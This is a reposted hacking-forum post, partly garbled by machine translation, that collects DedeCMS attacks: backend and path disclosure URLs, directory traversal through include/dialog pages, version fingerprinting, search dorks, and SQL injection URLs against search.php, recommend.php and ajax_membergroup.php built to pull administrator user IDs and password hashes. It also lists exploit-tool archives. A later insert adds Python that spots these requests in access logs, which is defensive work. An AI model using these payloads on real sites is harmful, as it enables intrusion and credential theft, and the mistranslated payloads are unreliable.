DeDeCMS 0day Injection Vulnerability Summary

白蚂蚁 (network security supervisor)
2017-06-20 05:34:24
1. include/dialog/select_soft.php reveals the DedeCMS backend. Older versions let you bypass login verification and access it directly without an administrator account; newer versions simply redirect to the backend.
2. include/dialog/config.php reveals the backend admin path.
3. include/dialog/select_soft.php?activepath=/include/FCKeditor jumps to that directory.
4. include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p reveals the site's absolute path.
5. Some older DedeCMS versions skip login verification entirely when this page is requested and display it directly, and /././././././././ can be used to walk up to the root directory. The access address is slightly different in those versions:
require/dialog/select_soft.php?activepath=/././././././././
The other files under include\dialog\ have the same problem, only with a different default directory; some of them can be used to view HTML and similar files. Files with the same problem include:
include \ dialog \ select_images.php
include \ dialog \ select_media.php
include \ dialog \ select_templets.php

Finding the version: /data/admin/ver.txt

/data/mysql_error_trace.inc  

/data/mysqli_error_trace.inc  

Google dorks:

inurl:?dopost=showad
site:www.xxx.com inurl:login.php?gotopage=

Path disclosure:
/plus/carbuyaction.php?dopost=return&code=bank
/plus/carbuyaction.php?dopost=return&code=cod
/Include/payment/alipay.php
/Include/payment/yeepay.php

ver.txt date: DedeCMS version
20121030: 5.7SP or 5.7
20120621: 5.7SP1, 5.7 or 5.6
20120430: 5.7SP, 5.7 or 5.6
20120709: 5.6
20111205: 5.7.18
20111111: v57, v56 or v55
20080307: v3, v4 or v5
20080324: v5 or later
20081218: 5.1sp
20100803: 5.6
20081009: v5.1sp
20080807: 5.1 or 5.2
20101021: 5.3
20090912: 5.5
20121107: 5.7
20111209: 5.6
20090810: 5.5


/plus/search.php injection:

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3, 4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,PWD,28来自+`%23 @__ admin`的29,30,31,32,33,34,35,36,37,38,39,40,41,42 +%23 @`\'`+] = a

/ plus / search .PHP?关键字= AS&typeArr [111%3D @'\'`)+联盟+选择+ 1,2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,PWD,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42 + from +`%23 @__ admin`%23 @`\'`+] = a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+ FROM +(选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((从+'%23 @__ admin` +极限+ 0选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+, 1),1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a

/plus/recommend.php?aid=1&_FILES [type] [名称]&_ FILES [type] [size]&_ FILES
[type] [type]&_ FILES [type] [tmp_name] = aa \'和+ char(@`'`)+ / *!50000Un
ion * / + / *!50000SeLect * / + 1,2,3,共 ncat(0x3C6162633E,group_conc
在(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20从%20`%23 @__ admin`%23

-------------------------------------------
Submit /plus/search.php?keyword=as&typeArr[uNion]=a


If the result shows
安全提示:请求错误步骤2!
then use the following exp directly:

xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1, 2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, PWD,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 +从+`%23 @__ admin`%23 @'\'`+] =一



If the result shows
安全提示:请求错误步骤1!
then use the following exp directly:

xx.com/plus/search.php?keyword=as&typeArr [111%3D @`\'`)+和+(SELECT + 1 + FROM +选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+从+'%23 @__ admin` +极限+ 0,1) ,1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a
___________________
Member injection

DedeCMS 5.7 injection
2012.05.12
① Injection vulnerability.
First visit "/data/admin/ver.txt" to get the system's last upgrade time, then visit "/member/ajax_membergroup.php?action=post&membergroup=1" and append the statement.
To view the administrator account:

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23 @__ admin`%20where%201%20or%20id = @`'`

To view the administrator password:


/部件/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
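From the defender's side, every request shape listed in this post leaves a distinctive trace in the web server access log. The following Python is an added example, not code from the original post or from DedeCMS: it flags requests to the endpoints named above whose abused parameter carries SQL keywords, backtick quoting or dot-segment traversal, and also flags direct hits on ver.txt and the error-trace files. The endpoint table, the patterns and the log lines are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint -> parameter prefix that the listed attacks abuse (constructed table).
WATCHED = {
    "/plus/search.php": "typeArr",            # injection sits in the typeArr[...] key
    "/member/ajax_membergroup.php": "membergroup",
    "/plus/recommend.php": "_FILES",          # forged _FILES[type][...] parameters
    "/include/dialog/select_soft.php": "activepath",
    "/include/dialog/select_images.php": "activepath",
    "/include/dialog/select_media.php": "activepath",
    "/include/dialog/select_templets.php": "activepath",
}
# Version / error-trace files: any request is a reconnaissance probe.
PROBES = {"/data/admin/ver.txt", "/data/mysql_error_trace.inc",
          "/data/mysqli_error_trace.inc"}
SQLI = re.compile(r"(?i)\bunion\b|\bselect\b|\bconcat\b|@`|#@__")
TRAVERSAL = re.compile(r"\.\./|(?:/\.){2,}")
REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify(line):
    """Return a list of (rule, path) findings for one combined-format log line."""
    m = REQ.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = url.path.lower()
    findings = []
    if path in PROBES:
        findings.append(("version/trace probe", path))
    param = WATCHED.get(path)
    if param is None:
        return findings
    # parse_qsl percent-decodes keys and values, so "%60" becomes "`" here.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if not key.startswith(param):
            continue
        blob = key + "=" + value           # check the key too: typeArr[...] abuse
        if SQLI.search(blob):
            findings.append(("sql injection attempt", path))
        if TRAVERSAL.search(blob):
            findings.append(("path traversal attempt", path))
    return findings

def scan(lines):
    """Run classify over a log and return (line_index, finding) pairs."""
    return [(i, f) for i, l in enumerate(lines) for f in classify(l)]

LOGS = [  # constructed sample lines: the first four should fire, the last two not
    '10.0.0.5 - - [20/Jun/2017:05:34:24 +0800] "GET /plus/search.php?keyword=as&typeArr[uNion]=a HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Jun/2017:05:34:30 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60%27%60%20Union%20select HTTP/1.1" 200 88',
    '10.0.0.5 - - [20/Jun/2017:05:35:01 +0800] "GET /include/dialog/select_soft.php?activepath=/././././ HTTP/1.1" 200 3000',
    '10.0.0.5 - - [20/Jun/2017:05:35:10 +0800] "GET /data/admin/ver.txt HTTP/1.1" 200 8',
    '10.0.0.7 - - [20/Jun/2017:05:36:00 +0800] "GET /plus/search.php?keyword=linux&typeArr[1]=2 HTTP/1.1" 200 4096',
    '10.0.0.8 - - [20/Jun/2017:05:36:05 +0800] "GET /index.php HTTP/1.1" 200 10240',
]
```

Several findings from one source address within a short window, especially a ver.txt probe followed by a search.php or ajax_membergroup.php hit, is the sequence the post itself describes and is the pattern worth alerting on.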


Dede+v5.7+feedback.php-12-10-31.zip
DedeCms buy_action SQL利用工具.zip

dedecms recommend.php注入利用工具.rar
DeDeCMS v5.7暴密码exp.rar

dedecms v55漏洞利用.zip
DeDECMS5.7 Inc 漏洞.rar

dedecms上传ODAY.zip
dede爆菊.zip

dede注入导出.zip
织梦(dedecms)全版本注入工具.zip

exp.zip

Title: DeDeCMS 0day Injection Vulnerability Summary
Author: 白蚂蚁
Source: 蚁安黑客官网
Please credit this link when reposting: http://www.mayidui.net/t623.html
#1 997704828 (编程小子) 2017-07-07 14:02
6666666666
#2 997704828 (编程小子) 2017-07-07 14:10
666
#3 997704828 (编程小子) 2017-07-07 14:10
6666666
#4 小影GG (白蚁王族) 2018-11-15 10:14
Probably doesn't work anymore, the version seems a bit old.